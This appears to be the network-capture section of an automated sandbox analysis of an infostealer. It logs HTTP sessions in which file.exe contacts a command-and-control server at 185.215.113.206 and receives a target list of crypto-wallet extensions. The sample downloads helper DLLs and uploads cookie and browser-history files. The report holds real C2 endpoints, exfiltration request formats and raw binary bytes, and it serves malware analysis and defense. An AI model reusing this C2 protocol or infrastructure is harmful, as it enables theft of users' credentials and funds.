                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278750896 CET1236INData Raw: 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48
                                                                                                                                                                                                                                                                                        Data Ascii: cGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278764009 CET212INData Raw: 61 6d 39 38 4d 58 77 77 66 44 42 38 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48
                                                                                                                                                                                                                                                                                        Data Ascii: am98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278773069 CET1236INData Raw: 56 47 56 36 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57 70 6e 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57
                                                                                                                                                                                                                                                                                        Data Ascii: VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3w
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278785944 CET1236INData Raw: 61 57 70 74 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d
                                                                                                                                                                                                                                                                                        Data Ascii: aWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGF
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.278798103 CET424INData Raw: 61 57 4a 73 61 33 77 77 66 44 42 38 4d 58 78 55 63 6e 56 7a 64 43 42 58 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44
                                                                                                                                                                                                                                                                                        Data Ascii: aWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.279103041 CET1236INData Raw: 5a 32 56 6d 66 44 46 38 4d 48 77 77 66 45 31 31 62 48 52 70 64 6d 56 79 63 31 67 67 52 47 56 47 61 53 42 58 59 57 78 73 5a 58 52 38 5a 47 35 6e 62 57 78 69 62 47 4e 76 5a 47 5a 76 59 6e 42 6b 63 47 56 6a 59 57 46 6b 5a 32 5a 69 59 32 64 6e 5a 6d
                                                                                                                                                                                                                                                                                        Data Ascii: Z2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.279114008 CET212INData Raw: 59 57 78 73 5a 58 52 38 63 47 56 75 61 6d 78 6b 5a 47 70 72 61 6d 64 77 62 6d 74 73 62 47 4a 76 59 32 4e 6b 5a 32 4e 6a 5a 57 74 77 61 32 4e 69 61 57 35 38 4d 58 77 77 66 44 42 38 55 32 46 6d 5a 56 42 68 62 43 42 58 59 57 78 73 5a 58 52 38 59 58
                                                                                                                                                                                                                                                                                        Data Ascii: YWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2Fs
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.280678988 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 268
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="message"fplugins------AFCAAEGDBKJJKECBKFHC--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.484937906 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:02 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 108
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                                                        Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:02.502674103 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBF
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 7475
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.216617107 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:02 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.761441946 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:03.961827993 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:03 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                                        ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 1106998
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        1192.168.2.449753185.215.113.206807352C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.766789913 CET202OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----JDAKJJDBGCAKKFHIJEGH
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 999
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:11.766827106 CET999OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33
                                                                                                                                                                                                                                                                                        Data Ascii: ------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:12.916863918 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:12 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.020102978 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDB
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 1451
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.020122051 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33
                                                                                                                                                                                                                                                                                        Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.716547966 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:13 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:13.805032015 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file"------FHIECBAFBFHIJKFIJDAK--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:14.499815941 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:13 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:14.867908955 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKF
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="file"------GHDHDBAECGCAFHJJDAKF--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.559767962 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:14 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:15.830007076 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.046894073 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:15 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 685392
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.046968937 CET112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                                                        Data Ascii: UhOt8]h1]UWVE
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.046982050 CET1236INData Raw: 85 c0 74 1e 8b 75 1c 8b 7d 14 8b 55 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52
                                                                                                                                                                                                                                                                                        Data Ascii: tu}UMt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047394991 CET212INData Raw: 00 0f 84 98 02 00 00 8b 75 18 85 f6 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24
                                                                                                                                                                                                                                                                                        Data Ascii: uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:16.047406912 CET1236INData Raw: 0f b6 c9 c1 e1 18 89 d7 89 54 24 18 0f b6 d2 c1 e2 10 09 ca 0f b6 7c 24 20 c1 e7 08 09 d7 0f b6 4c 24 24 09 f9 0f b6 d3 c1 e2 18 8b 5c 24 08 0f b6 ff c1 e7 10 09 d7 0f b6 5c 24 0c c1 e3 08 09 fb 0f b6 54 24 10 09 da 89 cb 31 c3 25 00 00 00 ff 81
                                                                                                                                                                                                                                                                                        Data Ascii: T$|$ L$$\$\$T$1%1%1T$D|$@|$t\$(D$\$(sFD$,D$s@D$,D$s<D$,sBD$,s@D$ ,D$ D$$D$$D$(D$GD$?
